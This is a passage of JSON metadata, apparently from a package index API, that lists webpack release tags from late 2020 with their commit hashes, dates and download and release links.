repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"